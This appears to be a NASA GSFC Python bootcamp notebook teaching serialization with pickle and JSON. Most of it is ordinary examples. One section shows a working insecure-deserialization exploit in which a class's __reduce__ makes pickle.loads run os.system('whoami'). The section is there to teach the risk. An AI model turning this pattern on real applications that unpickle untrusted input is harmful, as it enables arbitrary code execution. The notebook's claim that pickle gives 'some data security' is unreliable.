![NASA](http://www.nasa.gov/sites/all/themes/custom/nasatwo/images/nasa-logo.svg)

<center>
<h1><font size="+3">GSFC Python Bootcamp</font></h1>
</center>

---
<center>
<H1 style="color:red">
Serialization and Deserialization with Python
</H1>
</center>


In [None]:
from __future__ import print_function

## Useful References

- <a href="https://en.wikipedia.org/wiki/Serialization">Serialization</a> (Wikipedia)
- <a href="https://mindmajix.com/python/serialization">Serialization in python</a>
- <a href="https://code.tutsplus.com/tutorials/serialization-and-deserialization-of-python-objects-part-1--cms-26183">Serialization and Deserialization of Python Objects</a>

# <font color="blue"> Serialization and Deserialization</font>

> … the process of translating data structures or object state into a format that can be stored … or transmitted … and reconstructed later (possibly in a different computer environment). (Wikipedia)

* **Serialization** is a process of transforming objects or data structures into byte streams or strings. 
* These byte streams can then be stored or transferred easily. 
* This allows the developers to save, for example, configuration data or user's progress, and then store it (on disk or in a database) or send it to another location.
* The reverse process of serialization is known as **deserialization**.

### Why do we need serialization?

We need Serialization for the following reasons:

- **Communication**: Serialization involves the procedure of object serialization and transmission. This enables multiple computer systems to design, share and execute objects simultaneously.
- **Caching**: The time consumed in building an object is more compared to the time required for de-serializing it. Serialization minimizes time consumption by caching the giant objects.
- **Deep Copy**: Cloning process is made simple by using Serialization. An exact replica of an object is obtained by serializing the object to a byte array, and then de-serializing it.
- **Portability**: The major advantage of Serialization is that it works across different architectures or Operating Systems.
- **Persistence**: The State of any object can be directly stored by applying Serialization on to it and stored in a database so that it can be retrieved later.

![fig_sd](https://miro.medium.com/max/1150/1*9zJJ65xk8agiQXlqd7nYUw.jpeg)
Image Source: Phonlawat Khunphet

# <font color="blue">Pickle</font>

## <font color="red"> What is pickle?</font>

* The module `pickle` is used for serializing and deserializing a Python object structure. 
* Any object in python can be pickled so that it can be saved on disk. 
* `pickle` “serialises” the object first before writing it to file. 
* Pickling (serialization) is a way to convert a python object (list, dict, etc.) into a character stream which contains all the information necessary to reconstruct the object in another python script.

The following types can be serialized and deserialized using the `pickle` module:
* All native datatypes supported by Python (booleans, None, integers, floats, complex numbers, strings, bytes, byte arrays)
* Dictionaries, sets, lists, and tuples - as long as they contain pickleable objects
* Functions (pickled by their name references, and not by their value) and classes that are defined at the top level of a module

![fig_pickle](https://pythontic.com/python_pickle.png)

## <font color="red">Applications of Pickling</font>

* Saving a program's state data to disk so that it can carry on where it left off when restarted (persistence)
* Sending python data over a TCP connection in a multi-core or distributed system (marshalling)
* Storing python objects in a database
* Converting an arbitrary python object to a string so that it can be used as a dictionary key (e.g. for caching & memoization)
* Machine Learning (saving <a href="https://pythonprogramming.net/pickle-classifier-save-nltk-tutorial/">trained ML algorithm</a>)

## <font color="red">How to Use pickle</font>

In [None]:
import pickle

The main functions of `pickle` are:

* `dump()`: saves the pickled data out to the designated file.
* `load()`: takes a file object, reconstruct the objects from the pickled representation, and returns it.
* `dumps()`: serializes a python object hierarchy and returns the bytes object of the serialized object. It does not deal with writing the pickled object hierarchy into a file.
* `loads()`: reads the pickled data from a string.

`dump()`/`load()` serializes/deserializes objects through files but `dumps()`/`loads()` serializes/deserializes objects through string representation.

### Python Object Serialization

The pickle module turns an arbitrary Python object into a series of bytes. This process is also called serialization. 
* Useful for storing data
* Inter process communication

In [None]:
data_org = { 'a':'A', 'b':2, 'c':3.0 } 
print('Type: ', type(data_org))
print('DATA:', data_org)

The `dumps()` function creates a string representation of the value of the object.

In [None]:
data_string = pickle.dumps(data_org)
print('Type: ', type(data_string))
print('PICKLE:', data_string )

By default, the pickle will contain only ASCII characters. 

### Python Object Deserialization

* Once the data is serialized, you can write it to a file, socket, pipe, etc. 
* Then later you can read the file and unpickle the data to construct a new object with the same values.

**Get the data back from the serialized object**

In [None]:
print('BEFORE: ', data_org)

The `loads()` function converts the byte like object (from the pickled string representation) to corresponding Python object.

In [None]:
data2 = pickle.loads(data_string)
print('AFTER:  ',data2)

In [None]:
print('EQUAL?:', (data_org == data2))
print('SAME ?:', (data_org is data2))

**Write pickled data to a file and Read the data back**

The `dump()` writes byte representation of supported Python object to a file. The file itself should be a **binary file with write permission**.

In [None]:
with open('pickled_data_file.pkl', 'wb') as fid:
     pickle.dump(data_org, fid)

The `load()` function reads the byte data from a binary file and converts it to Python object.

In [None]:
# Read the data from the file
with open('pickled_data_file.pkl', 'rb') as fid:
     data3 = pickle.load(fid)

In [None]:
print('Data Before Write:', data_org)
print('Data After  Read :', data3)
print('EQUAL?:', (data_org == data3))

### Pickling and Unpickling Custom Objects

**Example 1**: Instance of a class

In [None]:
class Planets:
      def __init__(self, platnet_name, planet_size):
          self.size = planet_size
          self.name = platnet_name

In [None]:
mercury = Planets('Mercury', 1516.0)

* The file is opened in binary mode for writing. 

In [None]:
with open('pickle_instance.pkl', 'wb') as pickle_out:
     pickle.dump(mercury, pickle_out)

* The file is opened in binary mode for reading. 

In [None]:
with open('pickle_instance.pkl', 'rb') as pickle_in:
     unpickled_mercury = pickle.load(pickle_in)

In [None]:
print("Name: ", unpickled_mercury.name)
print("Size: ", unpickled_mercury.size)

**Example 2**: Collection of objects

In [None]:
def my_func():
    return "my_func was called"

In [None]:
with open('pickle_objects.pkl', 'wb') as pickle_out:
     # serialize class object
     pickle.dump(Planets, pickle_out)
     # serialize class instance
     pickle.dump(Planets('Jupiter', 43441), pickle_out)
     # serialize function object
     pickle.dump(my_func, pickle_out)
     # serialize complex number
     pickle.dump(3.7 + 2.5j, pickle_out)
     # serialize bytes object
     pickle.dump(bytes([1, 2, 3, 4, 5]), pickle_out)

* Objects are returned in the same order in which we have pickled them in the first place. 
* When there is no more data to return, the `load()` function throws `EOFError`.

In [None]:
with open('pickle_objects.pkl', 'rb') as pickle_in:
     # deserialize class object
     NewPlanets = pickle.load(pickle_in)
     # deserialize class instance
     new_jupiter = pickle.load(pickle_in)
     # deserialize function object
     new_func = pickle.load(pickle_in)
     # deserialize complex number
     new_complex = pickle.load(pickle_in)
     # deserialize bytes object
     new_byte = pickle.load(pickle_in)
     pickle.load(pickle_in)

* Once you have unpickled the data you can use it like an ordinary Python object.

In [None]:
mercury = NewPlanets('Mercury', 1516.0)
print(mercury.name, mercury.size)

In [None]:
print(new_jupiter.name, new_jupiter.size)

In [None]:
new_func()

In [None]:
print("Complex Number: ", new_complex)
print("Byte object: ", new_byte)

### Application: Insecure Deserialization

- This example will serialize an exploit to run the `whoami` command, and deserialize it with pickle.loads().

In [None]:
%%writefile insecure_deserialization.py

import os
import getpass
import pickle

# Attacker prepares exploit that application will insecurely deserialize
class Exploit(object):
   def __reduce__(self):
       """
         A special method that is referenced when we are serializing data. 
         The reduce function essentially tells the pickle library how to serialize the object. 
         Then, when we are unserializing the data, this information is used to rebuild the object.
       """
       return (os.system, ('whoami',))

# Attacker serializes the exploit
def serialize_exploit():
    shellcode = pickle.dumps(Exploit())
    return shellcode

# Application insecurely deserializes the attacker's serialized data
def insecure_deserialization(exploit_code):
    return pickle.loads(exploit_code)
    
if __name__ == '__main__':
   # Serialize the exploit
   shellcode = serialize_exploit()
   print("shellcode: {}".format(shellcode))

   # Attacker's payload runs a `whoami` command
   insecure_deserialization(shellcode)

- Imagine the above scenario in the context of a web application. 
- If you must use a native serialization format like Python’s pickle, be very careful and use it only on trusted input. 
- Never deserialize data that has travelled over a network or come from a data source or input stream that is not controlled by your application.
- In order to significantly reduce the likelihood of introducing insecure deserialization vulnerabilities one must make use of language-agnostic methods for deserialization such as JSON, XML or YAML.

## <font color="red">Conclusions</font>

**Advantages**

1. Helps in saving complicated data.
2. Quite easy to use, doesn’t require several lines of code and hence not bulky.
3. Saved data is not so readable hence provides some data security.

**Disadvantages**

1. Non-Python programs may not be able to reconstruct pickled Python objects.
2. Security risks in unpickling data from malicious sources.

**When to Pickle**

* Pickling is useful for applications where you need some degree of persistency in your data. Your program's state data can be saved to disk, so you can continue working on it later on. 
* It can also be used to send data over a Transmission Control Protocol (TCP) or socket connection, or to store python objects in a database. 
* Pickle is very useful for when you're working with machine learning algorithms, where you want to save them to be able to make new predictions at a later time, without having to rewrite everything or train the model all over again.

**When Not to Pickle**

* If you want to use data across different programming languages, pickle is not recommended. Its protocol is specific to Python, thus, cross-language compatibility is not guaranteed. 
* The same holds for different versions of Python itself. Unpickling a file that was pickled in a different version of Python may not always work properly, so you have to make sure that you're using the same version and perform an update if necessary. 
* You should also try not to unpickle data from an untrusted source. Malicious code inside the file might be executed upon unpickling.

# <font color="blue">Json</font>

## <font color="red"> What is JSON?</font>

* JSON (JavaScript Object Notation) is a popular data format used for representing structured data. 
* It is a text format that is language independent and can be used in Python, Perl among other languages. 
* JSON format is used for data communications between servers and web applications.
* It is built on two structures:

     - A collection of name/value pairs. This is realized as an object, record, dictionary, hash table, keyed list, or associative array.
     - An ordered list of values. This is realized as an array, vector, list, or sequence.

## <font color="red">JSON Data</font>

In [None]:
import json

The main functions of JSON are:

- `dump()`: Takes a Python object, serializes it and writes the output (which is a JSON string) to a file like object.
- `load()`: Deserializes the JSON object from the file like object and returns it.
- `dumps()`: Converts a Python datastructure to a JSON string
- `loads()`: Convert JSON data into Python data.

**Example of JSON Data**

```python
{
    "stations": [
        {
            "acronym": “BLD”, 
            "name": "Boulder Colorado",
            "latitude”: 40.00,
            "longitude”: -105.25
        }, 
        {
            "acronym”: “BHD”, 
            "name": "Baring Head Wellington New Zealand",
            "latitude": -41.28,
            "longitude": 174.87
        }
    ]
}
```

**Another Example of JSON Data**

We consider an online database, <a href="IP-API.com">IP-API.com</a>, that returns GeoIP data in JSON format. Simply opening <a href="http://ip-api.com/json/54.148.84.95">http://ip-api.com/json/54.148.84.95</a> will return the following JSON result:


```python
{
  "as": "AS16509 Amazon.com, Inc.",
  "city": "Boardman",
  "country": "United States",
  "countryCode": "US",
  "isp": "Amazon",
  "lat": 45.8696,
  "lon": -119.688,
  "org": "Amazon",
  "query": "54.148.84.95",
  "region": "OR",
  "regionName": "Oregon",
  "status": "success",
  "timezone": "America\/Los_Angeles",
  "zip": "97818"
}
```

To see your own Geolocation data in JSON format, just open <a href="http://ip-api.com/json/">http://ip-api.com/json/</a>.

+ The text in JSON is done through quoted string which contains value in key-value mapping within `{` `}`.
+ JSON data representation is very similar to Python dictionaries.
+ It supports primitive types, like strings and numbers, as well as nested lists and objects

## <font color="red">Convert Python Data Types into JSON </font>

Python objects and their equivalent conversion to JSON.

| Python | JSON Equivalent |
| --- | ---  |
| `dict` | object |
| `list`, `tuple` | array |
| `str` | string |
| `int`, `float` | number |
| `True` | true |
| `False` | false |
| `None` | null |

In [None]:
print("Dictionary: ", json.dumps({"name": "John", "age": 30}))
print("List:       ", json.dumps(["apple", "bananas"]))
print("Tuple:      ", json.dumps(("apple", "bananas")))
print("String:     ", json.dumps("hello"))
print("Integer:    ", json.dumps(42))
print("Float:      ", json.dumps(31.76))
print("True:       ", json.dumps(True))
print("False:      ", json.dumps(False))
print("None:       ", json.dumps(None))

**Convert JSON to Python Object (Dict)**

In [None]:
json_data = '{"acronym": "BLD", \
              "name": "Boulder Colorado", \
              "latitude": 40.00,  \
              "longitude": -105.25}'
python_obj = json.loads(json_data)
print("Name:     ", python_obj["name"])
print("Acronym:  ", python_obj["acronym"])
print("Latitude: ", python_obj["latitude"])
print("Latitude: ", python_obj["longitude"])

In [None]:
print(json.dumps(python_obj, sort_keys=True, indent=4))

**Convert JSON to Python Object (List)**

In [None]:
array = '{"drinks": ["coffee", "tea", "water"]}'
data = json.loads(array)

print(json.dumps(data, sort_keys=True, indent=4))
print()
for element in data["drinks"]:
    print(element)

**Convert JSON to Python Object**

In [None]:
json_input = '{"stations": [{"acronym": "BLD", \
                                "name": "Boulder Colorado", \
                            "latitude": 40.00, \
                            "longitude": -105.25}, \
                            {"acronym": "BHD", \
                             "name": "Baring Head Wellington New Zealand",\
                             "latitude": -41.28, \
                             "longitude": 174.87}]}'

In [None]:
decoded = json.loads(json_input)
for x in decoded['stations']:
    print(x["name"])

In [None]:
print(json.dumps(decoded, sort_keys=True, indent=4))

**Convert Python Object (Dict) to JSON**

In [None]:
d = {}
d["name"] = "Boulder Colorado"
d["acronym"] = "BLD"
d["latitude"] = 40.00
d["longitude"] = -105.25
d_js = json.dumps(d, ensure_ascii=False)
print(d_js)

**Convert Python Objects into JSON**

In [None]:
x = {
  "name": "John",
  "age": 30,
  "married": True,
  "divorced": False,
  "children": ("Ann","Billy"),
  "pets": None,
  "cars": [
    {"model": "BMW 230", "mpg": 27.5},
    {"model": "Ford Edge", "mpg": 24.1}
  ]
}

print("Python Object: \n\t", x)

In [None]:
for key in x:
    print("{}:\t {}".format(key, x[key]))

In [None]:
x_js = json.dumps(x)
print("Corresponding JSON Object: \n\t", x_js)

Going Back to Python:

In [None]:
y = json.loads(x_js)
for key in y:
    print(key+":\t", y[key])

**Convert Python String to JSON**

In [None]:
json_string = """
{
    "researcher": {
        "name": "Ford Prefect",
        "species": "Betelgeusian",
        "relatives": [
            {
                "name": "Zaphod Beeblebrox",
                "species": "Betelgeusian"
            }
        ]
    }
}
"""
data = json.loads(json_string)
print(json.dumps(data, sort_keys=True, indent=4))

## <font color="red"> Serialization and Deserialization</font>

**Serialization**

We use the `dump()` that takes two arguments: 
* The data object to be serialized.
* The file object to which it will be written.

In [None]:
file_name = "Sample.json"
with open(file_name, "w") as fid: 
     json.dump(x, fid)

The file object does not have to be a traditional file, any file pointer will work.

In [None]:
import sys
json.dump(x, sys.stdout)

**Deserializing JSON**

* The Deserialization is opposite of Serialization, i.e. conversion of JSON object into their respective Python objects. 
* We use the `load()` function which is usually used to load from string, otherwise the root object is in list or dict.

In [None]:
with open(file_name, "r") as fid: 
     z = json.load(fid)
        
print(z)

In [None]:
for key in z:
    print(key+":\t", z[key])

**Example**

Consider the following JSON data (from NASA's Astronomy Picture of the Day API) that we write in a file named `apod.json`.

In [None]:
%%writefile apod.json
{
    "media_type": "image",
    "copyright": "Yin Hao",
    "date": "2018-10-30",
    "url": "https://apod.nasa.gov/apod/image/1810/Orionids_Hao_960.jpg",
    "explanation": "Meteors have been shooting out from the constellation of Orion. This was expected, as October is the time of year for the Orionids Meteor Shower.  Pictured here, over two dozen meteors were caught in successively added exposures last October over Wulan Hada volcano in Inner Mongolia, China. The featured image shows multiple meteor streaks that can all be connected to a single small region on the sky called the radiant, here visible just above and to the left of the belt of Orion, The Orionids meteors started as sand sized bits expelled from Comet Halley during one of its trips to the inner Solar System. Comet Halley is actually responsible for two known meteor showers, the other known as the Eta Aquarids and visible every May. An Orionids image featured on APOD one year ago today from the same location shows the same car. Next month, the Leonids Meteor Shower from Comet Tempel-Tuttle should also result in some bright meteor streaks. Follow APOD on: Facebook, Instagram, Reddit, or Twitter",
    "hdurl": "https://apod.nasa.gov/apod/image/1810/Orionids_Hao_2324.jpg",
    "title": "Orionids Meteors over Inner Mongolia",
    "service_version": "v1"
}

Read the file:

In [None]:
with open("apod.json", "r") as f:
    json_text = f.read()

Decode the JSON string into a Python dictionary:

In [None]:
apod_dict = json.loads(json_text)
print(apod_dict['explanation'])

Encode the Python dictionary into a JSON string:

In [None]:
new_json_string = json.dumps(apod_dict, indent=6)
print(new_json_string)

In [None]:
new_json_string = json.dumps(apod_dict, indent=6, sort_keys=True)
print(new_json_string)

## <font color="red">Conclusion</font>

* JSON is standardized and language-independent (while `pickle` is specific to Python).
* It is more secure and much faster than `pickle`.
* If you only need to use Python, then the `pickle` module is still a good choice for its ease of use and ability to reconstruct complete Python objects.